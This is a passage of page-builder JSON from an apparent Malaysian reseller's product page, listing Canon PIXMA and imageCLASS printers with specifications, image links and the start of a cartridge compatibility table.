:-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"df0825f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"31\",\"right\":\"31\",\"bottom\":\"31\",\"left\":\"31\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td 